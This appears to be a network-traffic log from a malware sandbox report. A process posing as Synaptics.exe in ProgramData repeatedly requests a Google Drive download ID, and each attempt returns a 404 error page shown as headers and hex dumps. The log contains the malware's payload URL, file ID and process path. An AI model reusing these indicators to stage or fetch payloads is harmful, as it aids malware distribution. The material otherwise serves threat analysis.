                                                                                                                                                        2024-12-30 10:48:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:05 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eMo3WJ5biTZgt3mOKjCryA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.749830142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:06 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:06 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ZT3372iuHMGWyC2Vf-kOpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.749831142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:06 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-30 10:48:07 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7ywu_3TBP-MHjFpVsB2yRbR7tRjaSg_zGJzQaCblDdt9-PDcXGw7Qp7xLI4651CBjx
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:07 GMT
                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-R0EfUWx9XpW5Ur8e_oFlLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Set-Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT; expires=Tue, 01-Jul-2025 10:48:07 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:07 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 30 2d 5a 5f 68 46 6c 39 58 38 52 56 46 38 35 49 74 54 5f 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K0-Z_hFl9X8RVF85ItT_6w">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                        2024-12-30 10:48:07 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.749832142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:06 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-30 10:48:07 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7fA_f1yz2G6qMJnHHHlZpEROzFDu7u_4Gs0Mi34Cy03ddzgbGkvRLUkBSIZY2_2FH1
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:06 GMT
                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dnqnA7X8CQ1kQ9FIB-K8Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Set-Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg; expires=Tue, 01-Jul-2025 10:48:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:07 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 42 61 52 46 78 34 66 34 75 62 54 42 42 6c 39 41 73 36 46 78 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TBaRFx4f4ubTBBl9As6Fxg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                        2024-12-30 10:48:07 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.749842142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-x_99aJc4k16laYN9BKgV0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.749843142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:07 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-30 10:48:08 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4Is_SY6GhSH93Gfd4n8mrBZBjpgdlOHhWVwN3vxfYuPLI2YNcpq3gPe64ucg13EipQ
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-FKQQiM-Dc1ZGrfJu0-jOiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Set-Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy; expires=Tue, 01-Jul-2025 10:48:08 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:08 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 57 45 38 53 34 59 49 68 72 36 49 71 51 6d 72 6f 5f 4e 4f 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vWE8S4YIhr6IqQmro_NOAQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                        2024-12-30 10:48:08 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.749857142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:09 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC75sGvxFkdgXrovrw0O3ji1vGS1xugsTLKnSor4rG-MwSugKr5VjylxUzD5Ja7CAbT1
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:09 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ecn_lmiftaqPWmfLmp5kZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:09 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:09 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 77 46 65 70 6f 68 4e 35 66 48 4a 55 38 77 74 30 6e 6b 41 74 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="SwFepohN5fHJU8wt0nkAtw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:09 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.749858142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:08 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-81VldJIr29sABPa7Sp2xNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
